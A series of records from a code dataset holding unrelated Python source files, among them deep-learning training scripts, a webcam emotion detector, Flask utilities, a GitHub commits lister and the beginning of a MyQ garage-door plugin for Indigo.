f.write('''train_loss: {:.4f} val_metrics: {:.4f}\\n'''.format(epoch_loss_train, \n metrics_val))\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val metrics: {:4f}'.format(best_metrics))\n\n order_indexes = []\n for _ in range(5):\n wa_index = wa_index - 1 if wa_index > 0 else 4\n order_indexes.append(wa_index)\n\n return model, order_indexes\n\n\ndef average_weights(state_dicts: List[dict]):\n everage_dict = OrderedDict()\n for k in state_dicts[0].keys():\n everage_dict[k] = sum([state_dict[k] for state_dict in state_dicts]) / len(state_dicts)\n return everage_dict\n\n\ndef find_best_weights(model, dataloaders, device, checkpoints):\n all_weights = [torch.load(path) for path in checkpoints]\n best_score = 0\n best_weights = []\n\n for w in all_weights:\n current_weights = best_weights + [w]\n average_dict = average_weights(current_weights)\n model.load_state_dict(average_dict)\n score, _, _ = evaluate_model(model, dataloaders, device)\n print(score, best_score)\n if score > best_score:\n best_score = score\n best_weights.append(w)\n\n return best_weights\n\n\ndef main():\n seed_everything(SEED)\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n train_df = pd.read_csv(os.path.join('../../../input', 'train.csv'))\n train_df['ImageId'] = train_df['ImageId_ClassId'].apply(lambda x: x.split('_')[0])\n\n folds_ids = pd.read_csv('train-5-folds.csv')\n train_files = folds_ids.loc[folds_ids.fold != NUM_FOLD, 'ImageId_ClassId'].values\n valid_files = folds_ids.loc[folds_ids.fold == NUM_FOLD, 'ImageId_ClassId'].values\n\n # Dataset for train images\n train_dataset = Dataset_train(\n ids=train_files, \n df=train_df,\n augmentation=get_training_augmentation_crop_image(),\n preprocessing=get_preprocessing()\n )\n\n # Dataset for validation images\n valid_dataset = Dataset_valid(\n ids=valid_files, \n df=train_df,\n preprocessing=get_preprocessing()\n )\n\n dataloaders = {'train': torch.utils.data.DataLoader(train_dataset, shuffle=True, \n num_workers=0, batch_size=BATCH_SIZE),\n 'val': torch.utils.data.DataLoader(valid_dataset, shuffle=False, \n num_workers=0, batch_size=1)\n }\n\n dataset_sizes = {'train': len(train_dataset), 'val': len(valid_dataset)*5}\n\n model = smp.Unet('efficientnet-b3', classes=4, activation=None, encoder_weights='imagenet')\n #print(model)\n model = model.to(device)\n\n criterion = torch.nn.BCEWithLogitsLoss()\n optimizer_ft = torch.optim.Adam(model.parameters(), lr=LR)\n\n model, optimizer_ft = amp.initialize(model, optimizer_ft, \n opt_level=OPT_LEVEL)\n\n lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer_ft, mode='max', \n factor=REDUCE_LR_FACTOR,\n patience=REDUCE_LR_PATIENCE, \n min_lr=REDUCE_LR_MIN,\n verbose=True)\n \n #model.load_state_dict(torch.load(PATH_WEIGTS_PRETRAIN))\n model, order_indexes = train_model(model, criterion, optimizer_ft, dataloaders,\n dataset_sizes, lr_scheduler, device,\n num_epochs=EPOCHS, early_stop_patience=EARLY_STOP_PATIENCE)\n\n checkpoints = np.array(PATH_CHECKPOINTS)[order_indexes]\n\n best_weights = find_best_weights(model, dataloaders, device, checkpoints)\n best_weight = average_weights(best_weights)\n torch.save(best_weight, PATH_WEIGTS)\n \n\nif __name__=='__main__':\n main()\n","sub_path":"pytorch/segmentation/train_effnet_fp16_WA.py","file_name":"train_effnet_fp16_WA.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"454161433","text":"#!/usr/bin/env python3\n\n\"\"\"A python script that will play a playlist based on facial expression.\"\"\"\n\n# Import packages.\nimport numpy as np\nimport cv2\nimport dlib\nimport math\nimport os.path\n\n# My classes.\nfrom constants import PRED, HAAR, HAAR2, HAAR3, HAAR4\nfrom emotion_recognition import SVM\nfrom face_aligner import FaceAligner\n\n\nprint(__doc__)\n\n# Set Face Detectors.\nfaceDet = cv2.CascadeClassifier(HAAR)\nfaceDet2 = cv2.CascadeClassifier(HAAR2)\nfaceDet3 = cv2.CascadeClassifier(HAAR3)\nfaceDet4 = cv2.CascadeClassifier(HAAR4)\nfaceDet5 = dlib.get_frontal_face_detector() # dlib's face detector\n\n# Build the required objects.\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\npredictor = dlib.shape_predictor(PRED) # file must be in dir\nfa = FaceAligner(predictor, desiredFaceWidth=380)\ndata = {}\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef get_face_recs(image):\n \"\"\"Get dlib rectangle around the face.\"\"\"\n detections = faceDet5(image, 1)\n\n haar_detections = []\n if not len(detections) > 0: # dlib's detector will work over 50% of the time\n haar_detections = faceDet.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n haar_detections2 = faceDet2.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n haar_detections3 = faceDet3.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n haar_detections4 = faceDet4.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n if len(haar_detections) > 0:\n for (x, y, w, h) in haar_detections:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break # if found, no point in making another feature vector\n elif len(haar_detections2) > 0:\n for (x, y, w, h) in haar_detections2:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break\n elif len(haar_detections3) > 0:\n for (x, y, w, h) in haar_detections3:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break\n elif len(haar_detections4) > 0:\n for (x, y, w, h) in haar_detections4:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break\n\n return detections\n\n\ndef get_landmarks(image):\n \"\"\"As in svms.py, used to create feature vectors to train on.\"\"\"\n detections = get_face_recs(image)\n\n # We may detect 0, 1 or many faces. Loop through each face detected.\n for i, j in enumerate(detections):\n # Draw facial landmarks with the predictor class.\n shape = predictor(image, j)\n xlist = []\n ylist = []\n\n # Store X and Y coordinates in separate lists.\n for i in range(1, 68): # 68 because we're looking for 68 landmarks\n xlist.append(float(shape.part(i).x))\n ylist.append(float(shape.part(i).y))\n\n # Find both coordinates for the centre of gravity (middle point).\n xmean = np.mean(xlist)\n ymean = np.mean(ylist)\n\n # Calculate the distance from centre to other points in both axes.\n xcentral = [(x-xmean) for x in xlist]\n ycentral = [(y-ymean) for y in ylist]\n\n # Condition the vectors.\n landmarks_vectorised = []\n for x, y, w, z in zip(xcentral, ycentral, xlist, ylist):\n landmarks_vectorised.append(w)\n landmarks_vectorised.append(z)\n meannp = np.asarray((ymean, xmean))\n coornp = np.asarray((z, w))\n dist = np.linalg.norm(coornp-meannp)\n landmarks_vectorised.append(dist)\n landmarks_vectorised.append((math.atan2(y, x)*360)/(math.pi*2))\n if len(detections) < 1:\n return \"error\"\n return landmarks_vectorised\n\n\n# Build and train the classifier we're using.\nSVM = SVM()\nif (os.path.isfile('svm.pkl')):\n SVM.load()\nelse:\n SVM.train()\n SVM.save()\n\n# Open video capture.\ncap = cv2.VideoCapture(0)\nif cap.isOpened() is False:\n print(\"[Err] Capture failed to open.\")\n\ncv2.namedWindow(\"test\")\nwhile (cap.isOpened()):\n # Capture frame-by-frame.\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow(\"test\", frame)\n\n if not ret:\n break\n k = cv2.waitKey(1)\n\n if k % 256 == 27:\n # ESC pressed\n print(\"Quit\")\n break\n elif k % 256 == 32:\n # SPACE pressed\n lm = \"error\"\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n face_rect = []\n detections = get_face_recs(frame)\n for detection in detections:\n clahe_image = clahe.apply(gray)\n aligned = fa.align(clahe_image, detection)\n lm = get_landmarks(aligned)\n face_rect = detection\n break\n\n if lm is not \"error\":\n sample = np.array([lm])\n sample.reshape(1, -1)\n emotion = SVM.predict(sample)\n print(\"Emotion detected: {}\".format(emotion.capitalize()))\n cv2.putText(frame, emotion.capitalize(),\n (50, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 2)\n cv2.imshow(\"Frame\", frame)\n # TODO : MUSIC PLAYER\n\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"music_player.py","file_name":"music_player.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536829442","text":"'''\nCreated on 01/03/2014\n\n@author: alfred\n'''\nimport logging\nimport hashlib\nfrom flask import request as flask_request\nfrom flask.globals import current_app\nfrom dirty_models.model_types import ListModel\nfrom xml.etree.ElementTree import QName, ElementTree\nfrom functools import wraps\nfrom contextlib import contextmanager\nfrom mc_be.commons.exceptions import NotSupported\n\n\nlogger = logging.getLogger('utils')\n\n\nclass ProxyRequest:\n\n \"\"\"\n Create a proxy to flask request to set and get custom mc-pybe application\n \"\"\"\n\n def __getattr__(self, item):\n try:\n value = flask_request.custom_configuration[item]\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n value = getattr(flask_request, item)\n except KeyError:\n value = getattr(flask_request, item)\n return value\n\n def __setattr__(self, key, value):\n try:\n flask_request.custom_configuration[key] = value\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n flask_request.custom_configuration[key] = value\n\n def __delattr__(self, item):\n try:\n del flask_request.custom_configuration[item]\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n delattr(flask_request, item)\n except KeyError:\n delattr(flask_request, item)\n\n def get_custom_info(self):\n try:\n return flask_request.custom_configuration\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n\n def set_custom_info(self, info_dict):\n try:\n flask_request.custom_configuration.update(info_dict)\n except (AttributeError, TypeError):\n flask_request.custom_configuration = info_dict.copy()\n\n\n# Proxy for request to be used for custom configuration\nrequest = ProxyRequest()\n\n\nclass ProxyContext:\n\n '''\n Use it to create singletons on app context\n '''\n\n def __init__(self, name, namespace=\"ProxyContext\"):\n '''\n Constructor\n '''\n self._name = name\n self._namespace = namespace\n\n def _init_namespace(self):\n app = current_app\n if not hasattr(app, 'extensions'):\n app.extensions = {}\n\n if self._namespace not in app.extensions:\n app.extensions[self._namespace] = {}\n\n return app.extensions[self._namespace]\n\n def _get_object(self):\n return self._init_namespace()[self._name]\n\n def _install_object(self, obj):\n self._init_namespace()[self._name] = obj\n\n def __getattr__(self, name):\n return getattr(self._get_object(), name)\n\n def __setattr__(self, name, value):\n if name[0] == '_':\n return super(ProxyContext, self).__setattr__(name, value)\n setattr(self._get_object(), name, value)\n\n def __delattr__(self, name):\n delattr(self._get_object(), name)\n\n def __nonzero__(self):\n return bool(self._get_object())\n\n def __str__(self):\n return str(self._get_object())\n\n def __repr__(self):\n return repr(self._get_object())\n\n\ndef get_attr_by_path(obj, field, default=None):\n try:\n field, next_field = field.split('.', 1)\n except ValueError:\n next_field = ''\n\n if field == '*':\n if isinstance(obj, (list, ListModel, set)):\n for item in obj:\n value = get_attr_by_path(item, next_field, None)\n if value is not None:\n return value\n return default\n if isinstance(obj, dict):\n for index in obj:\n value = get_attr_by_path(obj, \"%s.%s\" % (index, next_field), None)\n if value is not None:\n return value\n return default\n\n try:\n value = getattr(obj, field)\n except AttributeError:\n try:\n value = obj[field]\n except TypeError:\n if field.isdigit():\n try:\n value = obj[int(field)]\n except (KeyError, IndexError):\n return default\n else:\n return default\n except KeyError:\n return default\n except KeyError:\n return default\n\n if len(next_field):\n return get_attr_by_path(value, next_field, default)\n\n if value is None:\n return default\n return value\n\n\ndef del_attr_by_path(obj, field):\n try:\n field, next_field = field.split('.', 1)\n except ValueError:\n next_field = ''\n\n if field == '*':\n if isinstance(obj, (list, ListModel, set)):\n for item in obj:\n del_attr_by_path(item, next_field)\n return\n if isinstance(obj, dict):\n for index in obj:\n del_attr_by_path(obj, \"%s.%s\" % (index, next_field))\n return\n\n if len(next_field):\n try:\n return del_attr_by_path(getattr(obj, field), next_field)\n except AttributeError:\n try:\n return del_attr_by_path(obj[field], next_field)\n except (KeyError, TypeError):\n return None\n else:\n try:\n delattr(obj, field)\n except AttributeError:\n try:\n del obj[field]\n except (KeyError, TypeError):\n pass\n\n return\n\n# def set_attr_by_path(obj, field, value):\n# try:\n# field, next_field = field.split('.', 1)\n# except ValueError:\n# next_field = ''\n#\n# if field == '*':\n# if isinstance(obj, (list, set)):\n# for item in obj:\n# set_attr_by_path(item, next_field, value)\n# return\n# if isinstance(obj, dict):\n# for index in obj:\n# set_attr_by_path(obj[index], next_field, value)\n# return\n# else:\n# if len(next_field):\n# try:\n# return set_attr_by_path(getattr(obj, field), next_field, value)\n# except AttributeError:\n# try:\n# return set_attr_by_path(obj[field], next_field, value)\n# except KeyError:\n# try:\n# return set_attr_by_path(obj[int(field)], next_field, value)\n# except (KeyError, ValueError):\n\n\ndef xml_to_dict(xml_elem, init_data=None, remove_ns=False):\n\n def clean_tag(tag):\n if isinstance(tag, QName):\n tag = tag.text\n if remove_ns and tag.startswith('{'):\n tag = tag[tag.index('}') + 1:]\n return tag\n\n def get_tag_value(tag):\n children = list(tag)\n if len(children):\n data = {}\n for child in children:\n data = xml_to_dict(child, data, remove_ns)\n return data\n return tag.text\n\n data = init_data or {}\n if isinstance(xml_elem, ElementTree):\n xml_elem = xml_elem.getroot()\n\n tag_name = clean_tag(xml_elem.tag)\n if tag_name not in data:\n data[tag_name] = get_tag_value(xml_elem)\n else:\n if not isinstance(data[tag_name], list):\n init_data[tag_name] = [data[tag_name], ]\n data[tag_name].append(get_tag_value(xml_elem))\n\n return data\n\n\ndef call_silently(func):\n @wraps(func)\n def inner(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except Exception as ex:\n logger.debug(ex)\n\n return inner\n\n\n@contextmanager\ndef subrequest_context():\n global request\n data = request.get_custom_info()\n\n with current_app.test_request_context():\n request.set_custom_info(data)\n yield\n\n\nclass StreamNotifyRequest:\n\n def __init__(self, stream, notify_func=None):\n self._stream = stream\n self._notify_func = notify_func\n\n def notify(self, data):\n if self._notify_func:\n self._notify_func(data)\n\n def read(self, bytes):\n rv = self._stream.read(bytes)\n self.notify(rv)\n return rv\n\n def readline(self, size_hint):\n rv = self._stream.readline(size_hint)\n self.notify(rv)\n return rv\n\n\nclass Checksum():\n\n MD2 = 'MD2'\n MD5 = 'MD5'\n SHA_1 = 'SHA-1'\n SHA_256 = 'SHA-256'\n SHA_384 = 'SHA-384'\n SHA_512 = 'SHA-512'\n\n @classmethod\n def calculate(cls, type, value, encode=True):\n if encode:\n value = str.encode(value)\n if type == cls.MD5:\n return hashlib.md5(value).hexdigest()\n elif type == cls.SHA_1:\n return hashlib.sha1(value).hexdigest()\n elif type == cls.SHA_256:\n return hashlib.sha256(value).hexdigest()\n elif type == cls.SHA_384:\n return hashlib.sha384(value).hexdigest()\n elif type == cls.SHA_512:\n return hashlib.sha512(value).hexdigest()\n else:\n raise NotSupported('{0} encrypt method not supported'.format(type))\n","sub_path":"mc-pybe-release-smip-R4/mc_be/commons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"46658628","text":"#!/usr/bin/python3\n\"\"\" github api challenge \"\"\"\nimport sys\nimport requests\n\nif __name__ == \"__main__\":\n r = requests.get('https://api.github.com/repos/{}/{}/commits'.\n format(sys.argv[2], sys.argv[1]))\n d = r.json()\n if len(d) > 10:\n it = 10\n else:\n it = len(d)\n for i in range(it):\n print(d[i].get('sha') + ': ' +\n d[i].get('commit').get('author').get('name'))\n","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"72194640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on March 2021\n@author: Timothy Praditia\n\nThis script contains the Training class that constructs the training object\nfor the model and defines all functions required for training\n\"\"\"\n\nimport torch\nfrom torchdiffeq import odeint\nimport numpy as np\nimport time\nfrom threading import Thread\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as plt\n\nclass Training:\n \n def __init__(self, model, params):\n \"\"\"\n Constructor\n \n Inputs:\n model : the model object constructed using the Net_Model class\n params : the configuration object containing the model settings\n \n \"\"\"\n\n self.params = params\n \n # Send model to the corresponding device (important when using GPU)\n self.model = model.to(self.params.device)\n \n # Choose between ADAM or LBFGS as the optimizer\n # LBFGS theoretically should work better compared to ADAM, but the\n # memory requirement and computation time is also higher\n \n if self.params.lbfgs_optim:\n self.optimizer = torch.optim.LBFGS(model.parameters(), lr = self.params.learning_rate)\n else:\n self.optimizer = torch.optim.Adam(model.parameters(), lr = self.params.learning_rate)\n \n # Initialize the initial epoch value, an empty list to store the training\n # loss values, and set initial best loss value as infinity, to be updated\n # after each iteration\n self.start_epoch = 0\n self.train_loss = []\n self.best_loss = np.infty\n \n # Define the filename to save and/or load the model\n self.model_save_file = self.params.model_path + \"\\\\\" + self.params.model_name + \".pt\"\n \n # Create a Tensorboard summary writer instance in the log directory\n # The Tensorboard summary includes the training and validation loss,\n # as well as hyperparameters values to be compared with other models\n self.tb = SummaryWriter(self.params.log_path)\n \n \n # Load the model if this instance is a training continuation from a\n # previous checkpoint\n if self.params.continue_training:\n print('Restoring model (that is the network\\'s weights) from file...')\n print()\n \n # Load the latest checkpoint\n self.checkpoint = torch.load(self.model_save_file)\n \n # Load the model state_dict (all the network parameters) and send\n # the model to the corresponding device\n self.model.load_state_dict(self.checkpoint['state_dict'])\n self.model.to(self.params.device)\n \n # Load the optimizer state dict (important because ADAM and LBFGS \n # requires past states, e.g. momentum information and approximate\n # Hessian)\n self.optimizer.load_state_dict(self.checkpoint['optimizer'])\n for state in self.optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.to(self.params.device)\n \n # Load the epoch and loss values from the previous training up until\n # the checkpoint to enable complete history of the training\n self.start_epoch = self.checkpoint['epoch']\n self.train_loss = self.checkpoint['loss_train']\n \n # Store the loss values in the Tensorboard log file\n for epoch in range(self.start_epoch):\n self.tb.add_scalar('training_loss', self.train_loss[epoch], epoch)\n \n \n def model_train(self, u0, t, data):\n \"\"\"\n This function trains the model\n \n Inputs:\n u0 : initial condition, dim: [num_features, Nx, Ny]\n t : time (a torch.tensor array containing all values of time steps\n in which the output of the model will be calculated and\n recorded)\n data : training data (breakthrough curve data, 1-D array)\n \n \"\"\"\n \n # Set the number of threads for this program to one\n torch.set_num_threads(1)\n \n # Define the closure function that consists of resetting the\n # gradient buffer, loss function calculation, and backpropagation\n # The closure function is necessary for LBFGS optimizer, because\n # it requires multiple function evaluations\n # The closure function returns the loss value\n def closure():\n \n # Set the model to training mode\n self.model.train()\n \n # Reset the gradient buffer (set to 0)\n self.optimizer.zero_grad()\n \n # Calculate the model prediction (full field solution)\n ode_pred = odeint(self.model, u0.to(self.params.device),\n t.to(self.params.device), rtol=1e-5, atol=1e-6)\n \n # Extract the breakthrough curve from the full field solution prediction\n cauchy_mult = self.model.flux_modules[0].cauchy_mult * self.model.flux_modules[0].D_eff\n pred = ((ode_pred[:,0,-2] - ode_pred[:,0,-1]) * cauchy_mult).squeeze()\n \n # Calculate the loss function using the sum squared error metric\n loss = self.params.error_mult * torch.sum((data.to(self.params.device)\n - pred)**2)\n \n # Extract the predicted retardation factor function for physical\n # regularization\n u = torch.linspace(0.0, 2.0, 100).view(-1,1).to(self.params.device)\n ret_temp = self.model.flux_modules[0].coeff_nn(u)\n \n # Physical regularization: value of the retardation factor should\n # decrease with increasing concentration\n loss += self.params.phys_mult * torch.sum(\n torch.relu(ret_temp[:-1] - ret_temp[1:]))\n \n # Backpropagate to obtain gradient of model parameters\n loss.backward()\n \n return loss\n \n # Plot the predicted retardation factor as a function of dissolved\n # concentration and update at each training epoch\n fig, ax = plt.subplots()\n u = torch.linspace(0.01, 2.00, 100).view(-1,1).to(self.params.device)\n ret_pred = 1 / self.model.flux_modules[0].coeff_nn(u) / 10**self.model.flux_modules[0].p_exp\n ax_pred, = ax.plot(u.cpu(), ret_pred.cpu().detach())\n plt.title('Predicted Retardation Factor',fontsize=16)\n plt.xlabel(r'$c_{diss}$ [mg/L]',fontsize=16)\n plt.ylabel(r'$R$',fontsize=16)\n plt.tight_layout()\n \n # Iterate until maximum epoch number is reached\n for epoch in range(self.start_epoch, self.params.epochs):\n \n # Start timer\n a = time.time()\n \n # Update the model parameters and record the loss value\n self.optimizer.step(closure)\n loss = closure()\n self.train_loss.append(loss.item())\n \n # If the training loss is lower than the best loss value,\n # update the best loss and save the model\n if self.train_loss[-1] < self.best_loss:\n self.best_loss = self.train_loss[-1]\n if self.params.save_model:\n thread = Thread(target=self.save_model_to_file(\n epoch))\n thread.start()\n \n # Write the loss values to the tensorboard log file\n self.tb.add_scalar('training_loss', self.train_loss[-1], epoch)\n \n # Stop the timer\n b = time.time()\n \n # Print out the epoch status\n print('Training: Epoch [%d/%d], Training Loss: %.4f, Runtime: %.4f secs'\n %(epoch + 1, self.params.epochs, self.train_loss[-1], b - a))\n \n # Update the retardation factor plot\n ret_pred = 1 / self.model.flux_modules[0].coeff_nn(u) / 10**self.model.flux_modules[0].p_exp\n ax_pred.set_ydata(ret_pred.cpu().detach())\n ax.relim()\n ax.autoscale_view()\n plt.draw()\n plt.pause(0.0001)\n \n # Load model from the latest saved checkpoint (i.e. with the lowest\n # training error)\n if self.params.save_model:\n self.checkpoint = torch.load(self.model_save_file)\n self.model.load_state_dict(self.checkpoint['state_dict'])\n self.model.to(self.params.device)\n \n # Plot the retardation factor and save if required\n ret_pred = 1 / self.model.flux_modules[0].coeff_nn(u) / 10**self.model.flux_modules[0].p_exp\n ax_pred.set_ydata(ret_pred.cpu().detach())\n ax.relim()\n ax.autoscale_view()\n plt.draw()\n plt.pause(0.0001)\n if self.params.save_model:\n plt.savefig(self.params.model_path + \"\\\\\" + self.params.model_name + \"_retardation.png\")\n \n \n def save_model_to_file(self, epoch):\n \"\"\"\n This function writes the model weights along with the network configuration\n and current performance to file\n \n Input:\n epoch : the current epoch number during training\n \n \"\"\"\n \n # Save model weights, optimizer state_dict, and epoch status to file\n state = {'epoch': epoch + 1, 'state_dict': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(), 'loss_train': self.train_loss}\n torch.save(state, self.model_save_file)\n \n # Write the training performance and the configuration of the model to \n # a file\n with open('exp00_config.py', 'r') as f:\n cfg_file = f.read()\n \n output_string = cfg_file + \"\\n\\n# Training Performance\\n\\n\"\n \n output_string += \"CURRENT_EPOCH = \" + str(epoch+1) + \"\\n\"\n output_string += \"EPOCHS = \" + str(self.params.epochs) + \"\\n\"\n output_string += \"CURRENT_TRAINING_ERROR = \" + \\\n str(self.train_loss[-1]) + \"\\n\"\n output_string += \"LOWEST_TRAINING_ERROR = \" + \\\n str(min(self.train_loss))\n \n # Save the configuration and current performance to file\n with open(self.params.model_path + '\\\\' + self.params.model_name +'_cfg_and_performance.txt', 'w') as _text_file:\n _text_file.write(output_string)","sub_path":"python/diffusion_sorption/experimental_data/exp04_training.py","file_name":"exp04_training.py","file_ext":"py","file_size_in_byte":10682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"14619050","text":"import sqlite3 as sql\nimport os\nfrom models.action import Action\nfrom models.condition import Condition\nfrom models.neuron import Neuron\n\n\nclass Brain:\n\n def __init__(self, actions, data):\n self.actions = [Action(name, event) for name, event in actions.items()]\n self.db_path = os.path.join(data['directory'], data['dbname'])\n self.table_name = data['tablename']\n\n self.neurons = [Neuron(action, Condition(self.db_path, self.table_name)) for action in self.actions]\n\n def result_generator(self, cursor, arraysize=100):\n \"\"\"\n An iterator that uses fetchmany to keep memory usage down\n \"\"\"\n while True:\n results = cursor.fetchmany(arraysize)\n if not results:\n break\n for result in results:\n yield result\n\n def run_simulation(self):\n \"\"\"\n Iterate over the dataset row by row and invoke all action events (fire the neuron) if a condition is met\n \"\"\"\n con = sql.connect(self.db_path)\n con.row_factory = sql.Row\n cursor = con.cursor()\n cursor.execute('select * from {}'.format(self.table_name))\n\n for row in self.result_generator(cursor):\n for neuron in self.neurons:\n neuron.signal(row)\n","sub_path":"models/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357498690","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n####################\n## Python to interface with MyQ garage doors.\n## based on https://github.com/Einstein42/myq-garage\n\nimport sys\nimport time\nimport requests\nimport logging\n\nfrom requests.auth import HTTPBasicAuth\nfrom requests.utils import quote\n\nfrom ghpu import GitHubPluginUpdater\n\nkCurDevVersCount = 1 # current version of plugin devices\n\nkDoorClose = '0'\nkDoorOpen = '1'\n\ndoorStateNames = [\"Unknown\", \"Open\", \"Closed\", \"Stopped\", \"Opening\", \"Closing\", \"Unknown\", \"Disconnected\", \"Unknown\", \"Unknown\"]\n\nuserAgent = \"Chamberlain/3773 (iPhone; iOS 10.0.1; Scale/2.00)\"\n\n################################################################################\nclass Plugin(indigo.PluginBase):\n\n ########################################\n # Main Plugin methods\n ########################################\n def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):\n indigo.PluginBase.__init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs)\n\n pfmt = logging.Formatter('%(asctime)s.%(msecs)03d\\t[%(levelname)8s] %(name)20s.%(funcName)-25s%(msg)s', datefmt='%Y-%m-%d %H:%M:%S')\n self.plugin_file_handler.setFormatter(pfmt)\n\n try:\n self.logLevel = int(self.pluginPrefs[u\"logLevel\"])\n except:\n self.logLevel = logging.INFO\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(u\"logLevel = \" + str(self.logLevel))\n \n self.loginOK = False\n\n\n def startup(self):\n indigo.server.log(u\"Starting MyQ\")\n\n self.myqDevices = {}\n self.triggers = { }\n\n self.apiData = {\n \"chamberlain\" : { \"service\" : \"https://myqexternal.myqdevice.com\",\n \"appID\" : \"Vj8pQggXLhLy0WHahglCD4N1nAkkXQtGYpq2HrHD7H1nvmbT55KqtN6RSF4ILB/i\"\n },\n \"craftsman\" : { \"service\" : \"https://craftexternal.myqdevice.com\",\n \"appID\" : \"eU97d99kMG4t3STJZO/Mu2wt69yTQwM0WXZA5oZ74/ascQ2xQrLD/yjeVhEQccBZ\"\n },\n \"liftmaster\" : { \"service\" : \"https://myqexternal.myqdevice.com\",\n \"appID\" : \"Vj8pQggXLhLy0WHahglCD4N1nAkkXQtGYpq2HrHD7H1nvmbT55KqtN6RSF4ILB/i\"\n },\n }\n\n self.updater = GitHubPluginUpdater(self)\n self.updateFrequency = float(self.pluginPrefs.get('updateFrequency', \"24\")) * 60.0 * 60.0\n self.logger.debug(u\"updateFrequency = \" + str(self.updateFrequency))\n self.next_update_check = time.time()\n\n self.statusFrequency = float(self.pluginPrefs.get('statusFrequency', \"10\")) * 60.0\n self.logger.debug(u\"statusFrequency = \" + str(self.statusFrequency))\n self.next_status_check = time.time()\n\n # Watch for changes to sensors associated with an opener\n indigo.devices.subscribeToChanges()\n\n\n def shutdown(self):\n indigo.server.log(u\"Shutting down MyQ\")\n\n\n def runConcurrentThread(self):\n\n try:\n while True:\n\n if self.updateFrequency > 0:\n if time.time() > self.next_update_check:\n self.updater.checkForUpdate()\n self.next_update_check = time.time() + self.updateFrequency\n\n if time.time() > self.next_status_check:\n self.getDevices()\n self.next_status_check = time.time() + self.statusFrequency\n\n self.sleep(60.0)\n\n except self.stopThread:\n pass\n\n def deviceStartComm(self, device):\n\n instanceVers = int(device.pluginProps.get('devVersCount', 0))\n if instanceVers >= kCurDevVersCount:\n self.logger.debug(u\"deviceStartComm: \" + device.name + u\": Device Version is up to date\")\n elif instanceVers < kCurDevVersCount:\n newProps = device.pluginProps\n newProps['IsLockSubType'] = True\n newProps[\"devVersCount\"] = kCurDevVersCount\n device.replacePluginPropsOnServer(newProps)\n device.stateListOrDisplayStateIdChanged()\n self.logger.debug(u\"deviceStartComm: Updated \" + device.name + \" to version \" + str(kCurDevVersCount))\n else:\n self.logger.error(u\"deviceStartComm: Unknown device version: \" + str(instanceVers) + \" for device \" + device.name)\n\n self.logger.debug(\"deviceStartComm: Adding Device %s (%d) to MyQ device list\" % (device.name, device.id))\n assert device.id not in self.myqDevices\n self.myqDevices[device.id] = device\n\n def deviceStopComm(self, device):\n self.logger.debug(\"deviceStopComm: Removing Device %s (%d) from MyQ device list\" % (device.name, device.id))\n assert device.id in self.myqDevices\n del self.myqDevices[device.id]\n\n\n def triggerStartProcessing(self, trigger):\n self.logger.debug(\"Adding Trigger %s (%d) - %s\" % (trigger.name, trigger.id, trigger.pluginTypeId))\n assert trigger.id not in self.triggers\n self.triggers[trigger.id] = trigger\n\n def triggerStopProcessing(self, trigger):\n self.logger.debug(\"Removing Trigger %s (%d)\" % (trigger.name, trigger.id))\n assert trigger.id in self.triggers\n del self.triggers[trigger.id]\n\n def triggerCheck(self, device):\n try:\n sensor = 